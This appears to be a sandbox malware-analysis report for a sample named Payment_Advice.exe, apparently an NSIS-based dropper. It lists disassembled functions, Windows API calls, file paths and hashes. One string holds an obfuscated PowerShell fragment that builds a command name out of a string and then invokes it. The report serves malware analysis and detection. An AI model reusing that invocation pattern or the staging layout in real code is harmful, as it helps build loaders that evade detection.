Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: ';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-3515442673
Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment_Advice.exe"), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
lstrcatW.KERNEL32(?,00409014), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment_Advice.exe"), ref: 0040580A
FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment_Advice.exe"), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB
"C:\Users\user\Desktop\Payment_Advice.exe", xrefs: 00405779
C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3821047887
Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
GetProcAddress.KERNEL32(00000000,?), ref: 00406280

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

RichEd20, xrefs: 00403AE6
RichEd32, xrefs: 00403AF1
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00403942, 0040394A, 004039ED, 004039F3, 00403A03
.exe, xrefs: 004039C0
C:\Users\user\AppData\Local\Temp\, xrefs: 004038BE
RichEdit, xrefs: 00403B0D
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
_Nb, xrefs: 00403A36, 00403A9E
: Completed, xrefs: 0040397A, 00403983, 00403991, 004039E0, 004039E6
RichEdit20W, xrefs: 00403AFE, 00403B04
"C:\Users\user\Desktop\Payment_Advice.exe", xrefs: 004038B5
.DEFAULT\Control Panel\International, xrefs: 0040391E
1033, xrefs: 004038D2, 0040392E

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-432615598
Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,00000001), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A

Strings

Inst, xrefs: 00402EA1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Null, xrefs: 00402EB3
&, xrefs: 00403002
C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
Error launching installer, xrefs: 00402E0A
"C:\Users\user\Desktop\Payment_Advice.exe", xrefs: 00402DC3
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
soft, xrefs: 00402EAA

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$&
API String ID: 2803837635-2782480357
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor, xrefs: 00401818, 00401834
"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac", xrefs: 00401770, 00401779, 00401786, 00401798, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas, xrefs: 00401781

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
API String ID: 1941528284-1422505914
Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

Completed, xrefs: 004051B3, 004051C3, 004051C9, 004051EC, 004051F8

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
